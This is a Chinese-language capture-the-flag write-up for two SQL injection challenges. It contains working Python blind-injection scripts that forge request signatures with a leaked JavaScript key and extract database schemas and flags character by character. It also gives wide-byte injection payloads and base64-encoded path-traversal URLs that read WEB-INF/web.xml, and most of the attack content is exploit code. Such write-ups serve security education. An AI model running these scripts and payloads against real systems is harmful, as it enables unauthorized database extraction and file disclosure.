ctf是不可能的,这辈子都不可能的,只能写写签到这个样子
数据库的秘密
查看源代码js
function signGenerate(obj, key) {
var str0 = '';
for (i in obj) {
if (i != 'sign') {
str1 = '';
str1 = i + '=' + obj[i];
str0 += str1
}
}
return hex_math_enc(str0 + key)
};
var obj = {
id: '',
title: '',
author: '',
date: '',
time: parseInt(new Date().getTime() / 1000)
};
function submitt() {
obj['id'] = document.getElementById('id').value;
obj['title'] = document.getElementById('title').value;
obj['author'] = document.getElementById('author').value;
obj['date'] = document.getElementById('date').value;
var sign = signGenerate(obj, key);
document.getElementById('queryForm').action = "index.php?sig=" + sign + "&time=" + obj.time;
document.getElementById('queryForm').submit()
}
key = 'adrefkfweodfsdpiru'
发现有js加密,还有一个hidden参数,其他两个字符类型的参数都有防火墙,所以我们要从author参数注入,进行盲注
过滤了database()
手残党,js加密翻译到python翻不来,直接调用js的函数好了,具体操作查看execjs库的使用方法
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import execjs
import time
import urllib
def get_js():
f = open("./math.js", 'r')
line = f.readline()
htmlstr = ''
while line:
htmlstr = htmlstr + line
line = f.readline()
return htmlstr
def js_encode(payload, time_str):
jsstr = get_js()
ctx = execjs.compile(jsstr)
key = 'adrefkfweodfsdpiru'
return(ctx.call('hex_math_enc','id=title=author='+payload+'date=time='+time_str+key))
def access(payload):
url = "http://116.85.43.88:8080/EHZTYREPPGMCQLNB/dfe3ia/index.php?"
urllib.unquote(payload)
data = {
"id": "",
"title": "",
"date": "",
"author":"admin'&&"+(payload)+"#",
"button":"search",
}
time_str = str(int(time.time()))
sign = js_encode(data['author'], time_str)
proxies = {'http': "http://127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
"Content-Type": "application/x-www-form-urlencoded",
"X-Forwarded-For": "123.232.23.245"
}
final_url = url + 'sig=' + sign + '&time=' + time_str
response = requests.post(final_url, data=data, headers=headers, proxies=proxies)
text = response.text
if 'admin' in text :
return 1
else:
return 0
def get_payload(i,w):
#payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
#payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
#payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ddctf')fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
#payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6374665f6b657937)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
payload = "((ord(substr((select group_concat(secvalue) from ctf_key7)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
return payload
if __name__ == '__main__':
dic = list("0qwertyuiopasdf{}ghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUVWXYZ=#$%^&*()-+!`")
pw = ''
for i in range(1, 40):
for w in dic:
if access(urllib.unquote(get_payload(i, w))):
num = ord(w)
w = chr(num)
pw += w
print pw
break
数据库名:ddctf
表名:ctf_key7,message
列名:secvalue
flag:DDCTF{JQDCSEMLJCCPJRMO}
专属链接
下载WEB-INF/web.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi93ZWIueG1s
mvc-dispatcher-servlet.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi9tdmMtZGlzcGF0Y2hlci1zZXJ2bGV0LnhtbA==
靠太菜了...日不动
注入的奥妙
在页面源码发现是个big5编码提示宽字节注入,宽字节的要点就是把单引号前面的转义斜杠吞掉或者添加一个转义斜杠转义掉。
所以直接日吧,fuzz
http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%Bb%a0'||%23
%E9%B1%8b'||1%23
%E9%B1%ad'||1%23
两道sql注入write up_第1张图片](http://img.e-com-net.com/image/info10/31a5cf129c8e4aac8139268a34833377.jpg)
image
两道sql注入write up_第2张图片](http://img.e-com-net.com/image/info10/05f6e411554b4b12a158bede2ae87273.jpg)
image
两道sql注入write up_第3张图片](http://img.e-com-net.com/image/info10/4b08197b8f39499fb0ac58b8c63a24e3.jpg)
image
开始盲注,脚本如下
过滤了dataabse(),还有大于小于号
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import time
import urllib
def access(payload):
url = "http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%B1%ad'||("
proxies = {'http': "http://127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
"Content-Type": "application/x-www-form-urlencoded",
}
full_url = url +payload+ ")%23"
response = requests.get(full_url,headers=headers,proxies=proxies)
text = response.text
if "test" in text :
return 1
else:
return 0
def get_payload(i,w):
#payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
#payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'# slqi
#payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' # message,route_rules,6d657373616765 726f7574655f72756c6573
#payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6d657373616765)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' #id,pattern,action,rulepass
payload = "((ord(substr((select group_concat(action) from route_rules)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
return payload
if __name__ == '__main__':
dic = list("0qwertyuiopasdfghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUV{}WXYZ=#$%^&*()-+!`")
pw = ''
for i in range(30, 100):
for w in dic:
if access(urllib.unquote(get_payload(i, w))):
num = ord(w)
w = chr(num)
pw += w
print pw
break
数据库里没找到flag,有个route表,估计又是找路径的什么鬼,无聊太菜了,不想日了
想起来写过某个针对这种盲注的菜鸡脚本,稍微改改就能用了
两道sql注入write up_第4张图片](http://img.e-com-net.com/image/info10/b64c2096e51848839c8a079a3bbffc80.jpg)
image.png
github地址,比较粗糙,求大佬轻喷:https://github.com/deenrookie/fff-sqli